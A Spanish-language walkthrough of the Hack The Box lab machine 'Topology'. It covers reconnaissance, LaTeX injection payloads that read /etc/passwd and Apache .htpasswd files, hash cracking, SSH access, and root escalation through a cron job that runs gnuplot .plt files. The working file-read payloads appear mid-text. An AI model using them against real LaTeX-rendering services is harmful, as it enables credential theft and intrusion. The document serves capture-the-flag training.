Topology es una máquina Linux de dificultad fácil que muestra una aplicación web LaTeX susceptible a una vulnerabilidad de inclusión de archivos locales (LFI). La explotación de la falla LFI permite la recuperación de un archivo .htpasswd que contiene una contraseña en hash. Al descifrar el hash de la contraseña, se obtiene acceso SSH a la máquina, lo que revela un cronjob root que ejecuta archivos gnuplot. La creación de un archivo .plt malicioso permite la escalada de privilegios.
Reconnaissance
Realizaremos un reconocimiento con nmap para ver los puertos que están expuestos en la máquina Topology. Este resultado lo almacenaremos en un archivo llamado allPorts.
❯ nmap -p- --open -sS --min-rate 1000 -vvv -Pn -n 10.10.11.217 -oG allPorts
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 00:18 CET
Initiating SYN Stealth Scan at 00:18
Scanning 10.10.11.217 [65535 ports]
Discovered open port 22/tcp on 10.10.11.217
Discovered open port 80/tcp on 10.10.11.217
Completed SYN Stealth Scan at 00:18, 12.62s elapsed (65535 total ports)
Nmap scan report for 10.10.11.217
Host is up, received user-set (0.050s latency).
Scanned at 2025-02-17 00:18:37 CET for 13s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.73 seconds
Raw packets sent: 65535 (2.884MB) | Rcvd: 65554 (2.623MB)
❯ extractPorts allPorts
[*] Extracting information...
[*] IP Address: 10.10.11.217
[*] Open ports: 22,80
[*] Ports copied to clipboard
Lanzaremos scripts de reconocimiento sobre los puertos encontrados y lo exportaremos en formato oN y oX para posteriormente trabajar con ellos. En el resultado, comprobamos que se encuentran abierta una página web de Apache.
❯ nmap -sCV -p22,80 10.10.11.217 -A -oN targeted -oX targetedXML
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 00:19 CET
Nmap scan report for topology.htb (10.10.11.217)
Host is up (0.041s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 dc:bc:32:86:e8:e8:45:78:10:bc:2b:5d:bf:0f:55:c6 (RSA)
| 256 d9:f3:39:69:2c:6c:27:f1:a9:2d:50:6c:a7:9f:1c:33 (ECDSA)
|_ 256 4c:a6:50:75:d0:93:4f:9c:4a:1b:89:0a:7a:27:08:d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Miskatonic University | Topology Group
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 88.87 ms 10.10.16.1
2 30.67 ms topology.htb (10.10.11.217)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.05 seconds
Transformaremos el archivo generado targetedXML para transformar el XML en un archivo HTML para posteriormente montar un servidor web y visualizarlo.
❯ xsltproc targetedXML > index.html
❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Añadiremos la siguiente entrada en nuestro archivo /etc/hosts.
Realizamos una enumeración de subdominios del dominio principal de la página web. Al finalizar el análisis, nos encontramos con dos nuevos subdominios: stats.topology.htby dev.topology.htb.
❯ wfuzz --hh=6767 -c --hc=404,400 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -H "Host: FUZZ.topology.htb" http://topology.htb 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://topology.htb/
Total requests: 220547
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000158: 200 5 L 9 W 108 Ch "stats"
000000821: 401 14 L 54 W 463 Ch "dev"
Total time: 90.09859
Processed Requests: 2278
Filtered Requests: 2276
Requests/sec.: 25.28341
Añadiremos estas nuevas entradas en nuestro archivo /etc/hosts.
Al acceder a la página web de http://dev.topology.htb, nos encontramos con la siguiente página web en la cual requiere ingresar credenciales que no disponemos.
Dado que nos encontramos ante una página web montada en un servidor de Apache, y por el tipo de autenticación que nos requiere ingresar, podemos pensar en que quizás esté utilizando Basic Auth y existan archivos de .htaccess o .htpasswd el cual contengan credenciales de usuarios.
Los . htaccess se utilizan para indicar al servidor web que se comporte de una determinada manera, añadiendo, limitando o modificando funcionalidades por defecto. Entre las utilidades de uso más frecuente se encuentran las configuraciones de acceso a la web, las restricciones de seguridad, las redirecciones, etc.
htpasswd es un archivo de texto que se usa para guardar los nombres de usuario y las contraseñas para la autenticación básica del Servidor HTTP Apache. El nombre del fichero se da en el fichero de configuración .
Initial Access
LaTeX Injection
Volveremos a la página de http://latex.topology.htb y probaremos de revisar si es vulnerable a LaTeX Injection el campo donde nos permite inyectar código LaTeX.
Interceptaremos la solicitud con BurpSuite, y comprobamos que la solicitud se tramita a través del método GET. Por otro lado, se verifica que la variable eqn es dónde podemos introducir código LaTeX.
En este ejemplo básico, introduciremos Gzzcoo y al enviar la solicitud, en la respuesta por parte del servidor se nos genera un PDF con el código LaTeX.
Reading Files with LaTeX Injection
Lo primero que intentaremos es intentar leer archivos arbitrarios del sistema mediante LaTeX Injection. A través de la siguiente inyección, trataremos de listar la primera línea del archivo /etc/passwd.
Verificamos que al inyectar el código, comprobamos que en el PDF generado se muestra la primera línea del archivo listado.
Al intentar listar todo el contenido de /etc/passwda través de la siguiente inyección LaTeX, se nos mostraba que había detectado un comando ilegal, con lo cual mediante el bucle, no podíamos listar el contenido entero del archivo.
Probamos de intentar ejecutar el comando id mediante la siguiente inyección LaTeX para intentar obtener un RCE. pero tampoco obtuvimos el resultado esperado.
\immediate\write18{id > output}
\input{output}
En la siguiente página web,s e nos menciona un paquete de code listing en donde podemos importar código desde un archivo.
En este caso, tratamos de incluir una imagen del contenido del archivo /etc/passwd, pero nos dio mensajes de error.
\lstinputlisting{/etc/passwd}
Para explotar la vulnerabilidad de LaTeX Injection, necesitamos inyectar código malicioso en un contexto donde LaTeX lo interprete y ejecute.
En este caso, el sitio parece encerrar automáticamente la entrada entre símbolos $ ... $, lo que significa que cualquier comando que intentemos inyectar quedará dentro del modo matemático de LaTeX. Para romper esa estructura y ejecutar nuestros propios comandos, podemos intentar cerrar la expresión con $ y luego insertar nuestra carga útil, finalizando con otro $ para restaurar el formato esperado.
Por ejemplo, la siguiente inyección nos permitiría leer el contenido de /etc/passwd:
Si la inyección es exitosa, el contenido del archivo debería aparecer renderizado dentro del documento generado por LaTeX, tal y como se muestra en este caso.
Por lo tanto, tenemos una manera de listar el contenido de archivos arbitrarios del sistema.
$\lstinputlisting{/etc/passwd}$
Information Leakage
Después de diferentes pruebas para intentar obtener información que nos pudiese servir y no obtener resultado ninguno, pensamos en que quizás exista el archivo .htpasswd y .htaccess de la página web dev.topology.htb que encontramos anteriormente que nos requería ingresar credenciales.
Por lo tanto, decidimos primero revisar la configuración de las páginas web de Apache que se encuentran habilitadas en el sistema objetivo, para tratar de revisar las rutas de configuración exacta de donde se encuentran los correspondientes archivos.
En el resultado obtenido, se nos mostró la configuración de las diferentes páginas web que llegamos a enumerar anteriormente.
Revisamos que la configuración de dev.topology.htb se encuentra en /var/www/dev.
Por lo tanto, sabiendo esta información podemos intentar listar el contenido del .htaccess de la página web indicada. Verificamos que en el PDF generado, se nos muestra el contenido del archivo que queríamos listar.
Tal y como mencionábamos anteriormente, se estaba utilizando un Basic Authpara acceder a dev.topology.htb. También se nos confirma la ruta en donde se encuentra almacenada el archivo .htpasswd el cual debería contener credenciales de acceso a la página web.
$\lstinputlisting{/var/www/dev/.htaccess}$
Decidimos listar el contenido del .htpasswd en el resultado obtenido, se nos muestra las credenciales del usuario vdaisley en formato hash, probablemente Apache MD5.
$\lstinputlisting{/var/www/dev/.htpasswd}$
Verificamos que el tipo de hash encontrado es Apache MD5. A través de hashcat, finalmente logramos crackear el hash y obtener las credenciales en texto plano.
Probamos de autenticarnos al SSH con las credenciales del usuario vdaisley, finalmente logramos el acceso remoto a la máquina y visualizar la flag de user.txt.
❯ ssh vdaisley@10.10.11.217
vdaisley@10.10.11.217's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-150-generic x86_64)
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Feb 16 18:59:18 2025 from 10.10.16.3ç
vdaisley@topology:~$ export TERM=xterm
vdaisley@topology:~$ cat user.txt
4313af6cb7**********************
Bypass Restrictions LaTeX Injection to perform Remote Code Execution
En el siguiente ejemplo, creamos un archivo llamado gzzcoo.php que contenía una webshell.
Probamos de utilizar la webshell subida, y se nos muestra la posibilidad de ejecutar comandos arbitrarios en el sistema objetivo.
En este caso, el usuario que ejecuta los comandos era www-data, con lo cual si utilizamos este método, deberíamos posteriormente ganar acceso como el usuario vdaisley.
Realizaremos una enumeración básica con el usuario vdaisleypara lograr verificar si disponemos de algún grupo interesante, permisos de sudoers o de algún binario con SUID. En este caso, no logramos obtener resultados interesantes para elevar nuestros privilegios.
vdaisley@topology:~$ id
uid=1007(vdaisley) gid=1007(vdaisley) groups=1007(vdaisley)
vdaisley@topology:~$ sudo -l
[sudo] password for vdaisley:
Sorry, user vdaisley may not run sudo on topology.
vdaisley@topology:~$ find / -perm -4000 2>/dev/null
/usr/sbin/pppd
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/sudo
/usr/bin/fusermount
/usr/bin/umount
/usr/bin/su
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chfn
Monitoring Processes (Pspy64)
Enumerando los directorios del sistema, nos encontramos con el directorio /opt el cual disponía de un directorio nombrado como gnuplot. Este directorio no disponemos del acceso correspondiente y verificamos que el propietario es el usuario root.
gnuplot es un programa de línea de comandos y GUI que puede generar gráficos bidimensionales y tridimensionales de funciones, datos y ajustes de datos .
vdaisley@topology:~$ ls -l /opt/
total 4
drwx-wx-wx 2 root root 4096 Jun 14 2023 gnuplot
vdaisley@topology:~$ ls -l /opt/gnuplot/
ls: cannot open directory '/opt/gnuplot/': Permission denied
Por lo tanto, probamos de enumerar los procesos que se encontraban en ejecución mediante pspy64. Este binario que disponemos en nuestro equipo local, lo compartiremos mediante un servidor web.
❯ ls -l pspy64
.rwxr-xr-x kali kali 3.0 MB Tue Jan 17 22:09:52 2023 pspy64
❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Desde el equipo comprometido, nos descargaremos el binario y le daremos los permisos de ejecución correspondientes.
Ejecutaremos el binario de pspy64 para analizar los procesos que se encontraban en ejecución en el sistema. Después de un breve tiempo, comprobamos que se están ejecutando mediante una tarea CRON, la ejecución de archivos con extensión .plt en el directorio /opt/gnuplot y posteriormente se ejecutan con gnuplot.
Lo primero que deberemos realizar, es comprobar que tenemos permisos de escritura en el directorio mencionado. Por lo tanto, crearemos un nuevo archivo .txt y le daremos los permisos de ejecución, esto para simular que podemos crear archivos.
Comprobamos que hemos logrado crear un archivo en el directorio /opt/gnuplot y también la capacidad de darle permisos de ejecución al archivo creado.
vdaisley@topology:/opt$ echo 'gzzco was where' > /opt/gnuplot/gzzcoo.txt
vdaisley@topology:/opt$ ls -l /opt/gnuplot/gzzcoo.txt
-rw-rw-r-- 1 vdaisley vdaisley 16 Feb 16 19:07 /opt/gnuplot/gzzcoo.txt
vdaisley@topology:/opt$ chmod +x /opt/gnuplot/gzzcoo.txt
vdaisley@topology:/opt$ ls -l /opt/gnuplot/gzzcoo.txt
-rwxrwxr-x 1 vdaisley vdaisley 16 Feb 16 19:07 /opt/gnuplot/gzzcoo.txt
Pensando que la tarea CRON que realiza la ejecución de los archivos .plt en dicho directorio sea root, tenemos una vía potencial para poder escalar privilegios.
En esta primera comprobación crearemos un archivo gzzcoo.plt que ejecute el comando whoami y redirija el output al archivo /tmp/whoami. Le daremos los permisos correspondientes y comprobaremos de la existencia del archivo y de que se hayan asignado los permisos correspondientes.
Después de un breve tiempo, comprobamos en el directorio /tmp que aparece el archivo creado whoami. Revisando el archivo, comprobamos que el comando whoami ha dado como resultado el usuario root.
Con esto, se confirma que tenemos una vía potencial de abusar de un script creado con extensión .plten el directorio mencionado para que posteriormente sea ejecutado a través de la tarea CRON del usuario root.
vdaisley@topology:/opt$ ls -l /tmp
total 3064
-rwxrwxr-x 1 vdaisley vdaisley 3104768 Jan 17 2023 pspy64
drwx------ 3 root root 4096 Feb 16 18:06 systemd-private-de1cea4b82844141bf370951bba87c3d-apache2.service-tr5Juh
drwx------ 3 root root 4096 Feb 16 18:55 systemd-private-de1cea4b82844141bf370951bba87c3d-fwupd.service-KgLzdh
drwx------ 3 root root 4096 Feb 16 18:06 systemd-private-de1cea4b82844141bf370951bba87c3d-ModemManager.service-twUI0h
drwx------ 3 root root 4096 Feb 16 18:06 systemd-private-de1cea4b82844141bf370951bba87c3d-systemd-logind.service-tw6iuf
drwx------ 3 root root 4096 Feb 16 18:06 systemd-private-de1cea4b82844141bf370951bba87c3d-systemd-resolved.service-YGF6Uf
drwx------ 3 root root 4096 Feb 16 18:06 systemd-private-de1cea4b82844141bf370951bba87c3d-systemd-timesyncd.service-zkIJAi
drwx------ 2 root root 4096 Feb 16 18:06 vmware-root_657-4022112241
-rw-r--r-- 1 root root 5 Feb 16 19:10 whoami
vdaisley@topology:/opt$ cat /tmp/whoami
root
En este caso, reemplazaremos el contenido de gzzcoo.plt para que en este caso asigne permisos de SUIDsobre el binario /bin/bash. Verificamos que se el script sigue estando en el directorio mencionado y dispone de los permisos de ejecución.
Después de un breve tiempo, revisamos el binario /bin/bash y comprobamos que se le han asignado los permisos de SUID, con lo cual finalmente logramos convertirnos en usuario root y visualizamos la flag root.txt
A través de la herramienta de , la utilizaremos para extraer los puertos del archivo que nos generó el primer escaneo a través de Nmap. Esta herramienta nos copiará en la clipboard los puertos encontrados.
Accederemos a y verificaremos el resultado en un formato más cómodo para su análisis.
Accederemos a y nos encontraremos con la siguiente página web.
Al ingresar directamente a y nos encontramos con la siguiente página web en la que podemos realizar Directory Listing.
Accederemos a y nos encontramos con la siguiente aplicación web en la cual nos permite introducir código LaTeX. Con lo cual, podríamos posteriormente comprobar si es vulnerable a LaTeX Injection.
Al acceder a nos encontramos con el siguiente contenido, el cual no parece tener contenido importante en él.
Probamos de autenticarnos con las credenciales encontradas en , logramos acceder a la página web, pero no obtenemos información interesante que nos pueda servir.
, nos muestra también una manera de poder llegar a acceder al equipo mediante LaTeX Injection logrando realizar un Bypass de las restricciones que se nos indicaba anteriormente.
Este archivo al parecer, es subido en , en el cual comprobamos el archivo creado.
